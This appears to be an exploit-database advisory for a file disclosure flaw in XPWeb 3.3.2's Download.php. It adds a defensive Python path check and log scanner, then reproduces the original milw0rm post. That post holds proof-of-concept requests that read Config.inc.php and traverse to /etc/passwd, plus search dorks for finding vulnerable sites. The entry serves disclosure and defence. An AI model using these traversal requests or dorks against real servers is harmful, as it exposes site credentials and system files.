Vendor: XPWeb
Submitted by: milw0rm.com
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Disclosure
CWE: 200
Product Name: XPWeb
Affected Version From: 3.3.2002
Affected Version To: 3.3.2002
Patch Exists: Yes
Related CWE: N/A
CPE: a:xpweb:xpweb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability

XPWeb 3.3.2 is vulnerable to remote file disclosure through the “url” parameter of Download.php: the value is used as a file path without being restricted to the intended download directory, so the server returns whatever file the parameter names. For example, a request to “/XPWeb_v3.3.2/Download.php?url=Config.inc.php” returns the contents of the application's “Config.inc.php” file, and a request to “/XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd” traverses out of the web root and returns the contents of “/etc/passwd”.

Mitigation:

Upgrade to the latest version of XPWeb (a release later than 3.3.2).
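The following is an added example (not XPWeb's code) showing the two defender-side checks this issue calls for: the containment and file-type check a download handler should apply to the “url” value, and a scan of web-server access logs that flags Download.php requests the check would have rejected. The download directory, allowed extensions and log lines are constructed assumptions.

```python
"""Defender-side checks for the XPWeb Download.php?url= file disclosure.
Added example, not XPWeb's own code; the download root, allowed
extensions and the access-log lines below are constructed assumptions."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

DOWNLOAD_ROOT = "/var/www/xpweb/downloads"   # assumed file store
ALLOWED_SUFFIXES = {".pdf", ".zip", ".txt"}

def is_safe_download(url_param: str, root: str = DOWNLOAD_ROOT) -> bool:
    """True only if url_param stays inside root after ../ resolution and
    names an allowed file type. The check is lexical so it runs offline;
    a live handler should also realpath() the target to defeat symlinks."""
    if not url_param or "\x00" in url_param:
        return False
    target = posixpath.normpath(posixpath.join(root, url_param.lstrip("/")))
    if posixpath.commonpath([root, target]) != root:
        return False   # traversal escaped the download directory
    return posixpath.splitext(target)[1].lower() in ALLOWED_SUFFIXES

# Common Log Format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

def scan_access_log(lines):
    """Return (ip, status, url_value) for Download.php requests the check rejects."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["path"])
        if not parts.path.lower().endswith("/download.php"):
            continue
        for value in parse_qs(parts.query).get("url", []):
            value = unquote(value)   # second decode catches %252e%252e
            if not is_safe_download(value):
                hits.append((m["ip"], m["status"], value))
    return hits

# Constructed sample log: the two PoC requests from the advisory, one benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Feb/2008:10:01:02 +0000] "GET /XPWeb_v3.3.2/Download.php?url=Config.inc.php HTTP/1.1" 200 812',
    '203.0.113.5 - - [17/Feb/2008:10:01:09 +0000] "GET /XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd HTTP/1.1" 200 1340',
    '198.51.100.7 - - [17/Feb/2008:10:02:15 +0000] "GET /XPWeb_v3.3.2/Download.php?url=report.pdf HTTP/1.1" 200 53211',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious Download.php request:", hit)
```

A 200 status on a flagged line means the server actually served the file, so those hosts should be treated as exposed rather than merely probed.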

Exploit-DB raw data:

### XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
### http://puzzle.dl.sourceforge.net/sourceforge/xpweb/XPWeb_v3.3.2.tgz
### POC :
###    /XPWeb_v3.3.2/Download.php?url=Config.inc.php
###    /XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd
### Dorks : intitle:XPWeb 3.3.2
###        intitle:XPWeb 3.0.1
### I'm tryagi .. TRYAG.Cc/cc

# milw0rm.com [2008-02-17]